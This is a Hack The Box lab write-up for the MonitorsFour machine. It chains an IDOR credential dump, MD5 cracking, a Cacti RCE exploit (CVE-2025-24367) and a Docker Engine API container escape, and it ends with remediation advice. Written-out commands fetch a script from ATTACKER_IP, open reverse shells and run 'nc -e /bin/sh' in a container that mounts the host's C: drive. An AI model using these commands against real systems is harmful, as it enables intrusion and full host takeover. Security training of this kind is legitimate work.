HTB MonitorsFour: IDOR to RCE to Docker Escape

Contenu protégé

Box HTB non-retired. Entre le mot de passe pour lire le writeup.

Introduction

MonitorsFour is an Easy Windows machine (running Docker Desktop) that chains an unauthenticated IDOR leaking plaintext MD5 credentials, Cacti RCE (CVE-2025-24367), and a container escape via an exposed Docker Engine API on port 2375.

Attack Overview

IDOR /user?token=0
      │
      └─► Full DB dump (MD5 hashes)
              │
              └─► Hash crack → Marcus:wonderful1
                      │
                      └─► Cacti login (v1.2.28)
                              │
                              └─► CVE-2025-24367 → RCE (www-data in Docker)
                                      │
                                      └─► deepce.sh → Docker API :2375 exposed
                                              │
                                              └─► Malicious container (alpine)
                                                      │
                                                      └─► Bind mount C:\ → root shell

Reconnaissance

Nmap scan shows only port 80 open:

nmap -sS -sV -sC 10.129.51.39

PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped

Add the main domain:

echo "10.129.51.39 monitorsfour.htb" | sudo tee -a /etc/hosts

VHost Enumeration

ffuf -w SecLists/Discovery/DNS/subdomains-top1million-20000.txt \
     -H "Host: FUZZ.monitorsfour.htb" \
     -u http://monitorsfour.htb

Result: cacti (Status 302). Add cacti.monitorsfour.htb to /etc/hosts.

Directory Enumeration

ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt \
     -u http://monitorsfour.htb/FUZZ \
     -e .php,.html,.txt,.bak,.js -v -ic -c

Notable endpoints: /login, /contact, /user, /forgot-password.

Foothold – IDOR on /user

The /contact endpoint leaks a PHP error revealing the server path:

Warning: include(/var/www/app/views/contact.php): Failed to open stream
in /var/www/app/Router.php on line 110

Hitting /user returns:

{"error":"Missing token parameter"}

Testing with token=0:

GET /user?token=0 HTTP/1.1
Host: monitorsfour.htb

Response contains a full user database dump:

[
  {
    "id": 2,
    "username": "admin",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator"
  },
  {
    "id": 5,
    "username": "mwatson",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user"
  }
]

The token parameter is not validated. This is an IDOR vulnerability.

Hash Cracking

The admin hash (56b32eb43e6f15395f6c46c1c9e1cd36) is MD5, no salt. It cracks instantly:

56b32eb43e6f15395f6c46c1c9e1cd36 → wonderful1

The login page at monitorsfour.htb does not accept the credentials, but the Cacti vhost (cacti.monitorsfour.htb) accepts Marcus:wonderful1.

Initial Access – CVE-2025-24367 (Cacti RCE)

Cacti version 1.2.28 is vulnerable to CVE-2025-24367, an authenticated remote code execution via arbitrary file write.

Start a listener:

ncat -lvnp 4444

Using a public PoC targeting the Cacti instance with Marcus:wonderful1:

python3 exploit.py -u http://cacti.monitorsfour.htb/ -U Marcus -P wonderful1 -l 10.10.14.181 -p 4444

A reverse shell is received as www-data inside a Docker container (ID 821fbd6a43fa).

User Flag

cat /home/marcus/user.txt

[redacted]

Privilege Escalation – Docker Engine API Escape

Container Enumeration with deepce.sh

Upload and run deepce.sh:

curl -o /tmp/deepce.sh http://ATTACKER_IP/deepce.sh
chmod +x /tmp/deepce.sh
/tmp/deepce.sh

Key findings:

Inside Docker container.
Container ID: 821fbd6a43fa.
Host IP: 172.18.0.1.
Kernel: 6.6.87.2-microsoft-standard-WSL2 (Windows host running Docker Desktop).
Docker API exposed unauthenticated on 192.168.65.7:2375.
Dangerous capabilities present (cap_chown, cap_dac_override, cap_fowner, cap_setuid, cap_net_raw).

The exposed Docker Engine API allows container management without authentication.

Docker API Abuse

Enumerate available images:

curl http://192.168.65.7:2375/images/json

alpine:latest is available locally.

Create a new privileged container that bind-mounts the Windows host C:\ drive:

curl -X POST -H "Content-Type: application/json" \
-d '{
  "Image": "alpine:latest",
  "Cmd": ["/bin/sh", "-c", "nc 10.10.16.181 4443 -e /bin/sh"],
  "HostConfig": {
    "NetworkMode": "host",
    "Mounts": [
      {
        "Type": "bind",
        "Source": "/run/desktop/mnt/host/c/",
        "Target": "/mnt"
      }
    ]
  }
}' \
http://192.168.65.7:2375/containers/create

Response contains the container ID.

Start the container:

curl -X POST http://192.168.65.7:2375/containers/<CONTAINER_ID>/start

Catch the reverse shell on port 4443:

# id
uid=0(root) gid=0(root) groups=0(root)
# ls /mnt
Users  Windows  Program Files ...

The Windows host filesystem is mounted at /mnt.

Root Flag

cat /mnt/Users/Administrator/Desktop/root.txt

[redacted]

Key Takeaways

Vulnerability	Root Cause	Remediation
IDOR on `/user` endpoint	`token` parameter not validated against session	Validate user token server-side; never return sensitive data without authorization
Unsalted MD5 password storage	MD5 without salt is trivially cracked	Use bcrypt, Argon2, or PBKDF2 with unique salts
CVE-2025-24367 (Cacti RCE)	Arbitrary file write in Cacti 1.2.28	Upgrade Cacti to patched version
Docker API exposed on port 2375	No authentication or TLS on Docker Engine API	Bind API to localhost only or use TLS client certificates
Privileged container creation from unauthenticated API	Ability to create arbitrary containers	Restrict API access; use authorization plugins

Resources

Nmap — Port scanning and service detection
ffuf — VHost and directory fuzzing
deepce.sh — Docker container enumeration and escape surface mapping
CVE-2025-24367 PoC — Cacti authenticated RCE
Docker Engine API documentation — Container management endpoints